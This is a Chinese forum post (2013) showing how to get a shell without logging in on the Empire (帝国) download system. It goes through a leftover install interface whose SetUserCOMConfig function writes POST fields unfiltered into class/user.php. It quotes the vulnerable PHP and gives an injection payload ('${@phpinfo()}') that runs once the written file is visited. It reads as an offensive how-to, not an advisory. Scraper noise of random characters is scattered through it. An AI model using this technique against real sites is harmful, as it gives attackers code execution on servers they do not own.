这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
% p/ h0 N4 p% y$ _- ]2 K3 `1 B7 E4 N! d& R/ q* A) P, ^7 W
3 ~& c. m# d$ _$ E% S. e0 W3 `
这是帝国的一套下载系统 如图; H0 Q* O/ ~' U! |
ps(不需要任何账户和密码,直接写shell)
_1 X3 J& G* z" O2 s) B由于很多站是由于下载要整合discuz 等等一些论坛....2 B7 c5 v# U# G2 {. z
_8 E0 e g) G5 D1 S+ D
而帝国他又有一个万能接口,如图
( a7 R0 U" A8 \( J* h5 a& O* f0 y% J/ l* E
! `# ~0 x, E" v& ^
' c5 Z! H+ L+ b0 f' y而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码0 ]# F; ?- L0 q1 Y+ W& i
1 P$ y/ p7 r( c1 Y6 X当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
3 J+ e! _3 p/ r6 J7 @+ b j. x2 {4 f& l
在data/fun.php中的15行
# w/ K6 V4 W+ ~& h3 Q4 E* ~" K
% \; x/ p/ }* i" b! f; j我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {; X' b) z6 U& |+ u) M
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
* S6 F0 {1 v: m- o+ M) D7 R& ?! }4 D9 M; D/ g
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
; [' a5 C+ i5 q
* S+ |/ a& p" i! `* h8 a他将传进来的变量进行了切割,然后赋给了$filetext4 D6 j/ a& A3 X
/ e% X- U& K' A* H1 T8 _
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
8 L! `& D# T2 b0 ^: X; t
?4 h; k* x3 m7 @' H, O4 T; U( E我们看看写入的结果,随便填一个 k0 l. }* B: A' Y K! I3 d* d, _
) x9 _) A$ J" v. ~ g9 `5 ` J
. V0 B9 {# W Y' ~% z/ Q
" K. m0 Q9 {. X$ C/ E$ i
/ D' H8 s9 X" ~ A4 ]
; i( I" ~ {& e. D
0 E7 q0 O3 k) U ]! f& T
; R$ [; h, h z& o5 ]! n4 g! d8 v+ s0 `& t5 J( N- I
' l9 m! o: m! E1 N
`6 v& P6 G: ] R# y5 d. {! E6 n9 j" p
6 D; q+ Q( ^* a0 w+ j) I$ e J
7 s1 y$ a* ~' }$ I% T, Z% E" _8 r1 |8 }& P9 r. D
# a4 \* d7 h: o& K" |2 o
! k; f- w/ t- o
. G" P! N2 b% J3 y
7 e7 O7 H4 a: G5 a _0 g% K' i8 P) n: Q) Q
! B6 _3 D+ P% v2 k4 f; a# _
所以我们淫荡点,写个${@phpinfo()}试试 7 G. p- q7 U# c
然后访问以下class/user.php这个文件4 c. d' ^% o2 F
日了吧
2 `9 X" L( k' E' S2 X1 r8 [6 z' {
/ ^! f* j7 @! j7 L/ ~6 q+ K8 z8 m1 t
9 E1 U: f+ i" ?: F/ _' \0 S5 D" r7 ` t
7 {2 Y- q8 }4 c M8 p | 
发表于 2013-1-23 09:34:37
收藏
支持
反对